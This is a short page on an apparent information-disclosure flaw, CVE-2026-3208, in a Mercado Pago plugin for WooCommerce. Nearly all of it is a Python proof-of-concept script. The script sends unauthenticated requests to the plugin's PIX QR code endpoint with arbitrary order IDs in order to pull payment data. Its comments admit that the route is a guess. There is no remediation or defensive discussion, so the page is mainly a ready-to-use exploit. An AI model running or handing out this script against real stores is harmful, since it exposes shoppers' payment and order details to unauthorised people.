CVE-2026-3208: Mercado Pago插件信息泄露漏洞

import requests # Sample POC to demonstrate unauthorized access to PIX QR code # Usage: python poc.py <target_url> <order_id> def exploit(target_url, order_id): # The vulnerable endpoint is usually registered under the WooCommerce API namespace # Based on the plugin source (PixGateway.php), the route might be structured like this. # Adjust the endpoint path if the specific route prefix differs. endpoint = f"{target_url}/wp-json/wc/v3/mp_pix_image" # Parameters required to fetch the QR code for a specific order params = { 'order_id': order_id } try: # Send GET request without authentication headers response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: print(f"[+] Success! Retrieved data for Order ID: {order_id}") print("[+] Content-Type:", response.headers.get('Content-Type')) # Assuming the response is the image data (binary) # In a real scenario, save this to a file and scan with a QR reader print(f"[+] Data length: {len(response.content)} bytes") print("[+] Response content preview (first 100 bytes):", response.content[:100]) elif response.status_code == 401 or response.status_code == 403: print(f"[-] Failed: Access denied. The target might be patched.") else: print(f"[-] Failed: HTTP {response.status_code}") print(response.text) except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Example usage target = "http://example.com" oid = "123" exploit(target, oid)